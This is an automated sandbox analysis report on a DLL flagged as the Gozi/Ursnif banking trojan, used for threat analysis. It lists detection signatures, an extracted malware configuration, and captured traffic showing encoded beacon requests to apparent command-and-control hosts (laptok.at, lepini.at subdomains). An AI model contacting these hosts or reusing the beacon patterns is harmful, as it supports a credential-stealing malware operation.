Analysis Report NJPcHPuRcG.dll

Overview

General Information

Sample Name: NJPcHPuRcG.dll
Analysis ID: 353243
MD5: 48ac334e786156ef605b82dd563373f4
SHA1: 1710cf3539eaaf618a613e690157adf30550fade
SHA256: 71b928fd0b29e21bbfa4755b5347f4dc40653a82ec7ecf4947e325dbec23abaa
Tags: dll, Gozi, ISFB, Ursnif

Detection

Gozi Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected Gozi e-Banking trojan
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Dot net compiler compiles file from suspicious location
Yara detected Ursnif
Changes memory attributes in foreign processes to executable or writable
Compiles code for process injection (via .Net compiler)
Creates a thread in another existing process (thread injection)
Disables SPDY (HTTP compression, likely to perform web injects)
Hooks registry keys query functions (used to hide registry keys)
Injects code into the Windows Explorer (explorer.exe)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Modifies the import address table of user mode modules (user mode IAT hooks)
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Suspicious powershell command line found
Tries to steal Mail credentials (via file access)
Writes or reads registry keys via WMI
Writes registry values via WMI
Writes to foreign memory regions
Compiles C# or VB.Net code
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query CPU information (cpuid)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the installation date of Windows
Queries the volume information (name, serial number etc) of a device
Registers a DLL
Searches for the Microsoft Outlook file path
Sigma detected: Suspicious Rundll32 Activity
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection:

Found malware configuration
Source: regsvr32.exe.6448.2.memstr Malware Configuration Extractor: Ursnif {"server": "730", "os": "10.0_0_17134_x64", "version": "250180", "uptime": "153", "system": "a271e0af49f6ad8f6473361d635135dbhh", "size": "202829", "crc": "2", "action": "00000000", "id": "1100", "time": "1613453205", "user": "1082ab698695dc15e71ab15cb0e88a2a", "hash": "0xf857f57e", "soft": "3"}
Multi AV Scanner detection for submitted file
Source: NJPcHPuRcG.dll Virustotal: Detection: 15%

Compliance:

Uses 32bit PE files
Source: NJPcHPuRcG.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Uses new MSVCR Dlls
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49732 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.20.184.68:443 -> 192.168.2.5:49733 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49751 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49746 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49748 version: TLS 1.2
Source: unknown HTTPS traffic detected: 151.101.1.44:443 -> 192.168.2.5:49750 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001B.00000002.386301089.000001BF2C130000.00000002.00000001.sdmp, csc.exe, 0000001E.00000002.395773551.0000021C02EB0000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000002.00000003.399265085.0000000005970000.00000004.00000001.sdmp
Source: Binary string: wntdll.pdb source: explorer.exe, 00000024.00000003.471981638.0000000006C40000.00000004.00000001.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.426711747.0000000006FE0000.00000002.00000001.sdmp
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_02773512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_02773512
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05415518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 2_2_05415518
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_05404CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 2_2_05404CF1
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 2_2_0540B88D
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_0540834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 2_2_0540834C
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 2_2_054016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 2_2_054016E1

Networking:

HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.20.184.68
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 9e10692f1b7f78228b2d4e424db3a98c
Source: global traffic HTTP traffic detected: GET /api1/QSqnACLeyr6hdgRM/z5FskeEfxxW4Q1R/GsITkxgk46HCnUm5Kd/11eB4QB_2/FS2OIfou_2BVahhCN2i1/lN05g44fSdWuZ34SVM_/2F18tQh3ZP_2B9CZltVRIM/NAJawsHjH4mX4/XILaVciO/5e8TUIFZ7ccd8Dn_2F8wtDN/DA_2BihyHs/BqbIiQ7x5yFYJOUsg/scHsHuDvL_2F/a38zFWCcfG3/xo4sCKeZx_2FgB/qzrd3KTzhXtd1iKJfTVBW/TIaj2x4Rf3CB0n8w/wlBMav7PHwJXLsZ/IliJcWNYhk60Yrdjmm/3OHtbL5dY/ANYcc2W_2Bf_2FIiYenV/jXNvqJX5m02G5/F HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/9a3FdV_2FOe2lNWBzywhye/a2rzbdQuOhRbh/1tMI9TP_/2FFHpcEjc2zIsj3nY_2FaRD/bbKOnK6Aw9/T9Li8ZpaG0hs_2FEE/_2B0kgl3vplN/HPMJmXJvTbm/kjHzz19HUtkaT1/4BDTN7ZVSNKtMR3H5nP4a/s8_2F3CxujepwtCo/By36bxNYadNwz_2/FEk2aSXfXLicJH7n4U/7D_2FTfi5/cc2nrD5Ag2qXRkQmnDt6/1GTWH5aoTuyoAdeDUx1/UqFEv13ML45n9P1f5D7a2h/spqio1V138YVU/_2FSoCJL/_2BPfPH_2FwmC1xDPsgb90b/lJFlQYaXBd/gV1Ci2eCEez/TspIchn HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm6BSIFzHirA83QDIG_/2FbmOJUxF8/ud5_2Fql9hZq1SzAT/Mwor9Yan0pTL/Fp7ZNYW1P4i/kA3p_2Ft9A_2Fs/RuUNpyL5CsQBX14_2BDvT/1fDvmlCtb0dss45p/clOsmGOkIAiGzqR/LxhkYHtCoZLc014ID_/2BtL4MOOe/oIJGNpJMiO7LF1VXD1cY/3TSy0R_2FzpOndwhSFh/jEmLA5uqXYEdrQwipf8a_2/FYxkdf4zOPfe0/vr4tnHHd/_2Fh2Azy7z8mKYRQWXwGF6y/SDOEEBL HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /jvassets/xI/t64.dat HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: c56.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: global traffic HTTP traffic detected: GET /api1/AV8RjqvumRQ/OvLh7PdTNMKGa7/3LP4_2BG3LRcoZojWSk5u/NsORJjPn_2Fv_2B1/6Rz2NQs3_2FAyK6/XQQdYcU_2Fse_2F2j3/Zr9Hx_2Ba/98olXIGwinJCl_2FG4zm/M7DRWkrkSQ3KxF_2B9c/y19JwEmq4VBfpQCfptESLl/3GITd_2BqQxr2/SZAx9P1V/YikBhoAaQcpPJtcNJcJIY1_/2BjEuQfwCu/DUjEswX2uyguNEfAU/ZGf5P4bm4kOR/ZxxrQAreiF2/UPHWjC6fJcwkvj/jLEwRcMGH9odoyp8GuEAA/_2BQntTJU4ER5IW5/BN_2BQxL/y8vbI87 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Host: api3.lepini.at
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 3653 equals www.hotmail.com (Hotmail)
Source: explorer.exe, 00000024.00000000.431527658.0000000008B68000.00000004.00000001.sdmp String found in binary or memory: :2021021520210216: user@https://www.msn.com/de-ch/?ocid=iehpMSN Schweiz | Sign in Hotmail, Outlook Login, Windows Live, Office 365g equals www.hotmail.com (Hotmail)
Source: unknown DNS traffic detected: queries for: www.msn.com
Source: unknown HTTP traffic detected: POST /api1/bXII_2FHb0focJwi2/NKTIw_2FgiKf/ws9atmb5xre/8ghQ36n3SNQg84/1PN9WyLcQDb7Ra3wHIhjp/FiUmpJqa00TMQIaH/_2BHj0Q4IM1ltM6/5khUyF_2BRsPcD5Q37/C_2FE9BKN/CafUcW267Vk_2FIY_2Bn/_2BcfZsnCXmPwjFlUTt/pXytrrnaXNmzXOHxla9mOU/6X7At_2B8RTFx/TPw_2FzM/jbcnoszV5Xhd9jlATPIAobN/UMGaXl3YDQ/Krg2ExScIQW_2Fg_2/BTQ5TzTymRNC/sxopWB80XHY/7SN_2FkITnVhH7/8XPMTwHoJBXOcWd_2Fyk4/T_2Bzs HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0Content-Length: 2Host: api3.lepini.at
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 15 Feb 2021 20:26:44 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp String found in binary or memory: http://%s.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp String found in binary or memory: http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm
Source: explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp String found in binary or memory: http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: regsvr32.exe, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txt
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: powershell.exe, 00000019.00000003.444661390.000001BFEACB7000.00000004.00000001.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp String found in binary or memory: http://fontfabrik.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://home.altervista.org/favicon.ico
Source: regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp String found in binary or memory: http://https://file://USER.ID%lu.exe/upd
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://msk.afisha.ru/
Source: powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp String found in binary or memory: http://sads.myspace.com/
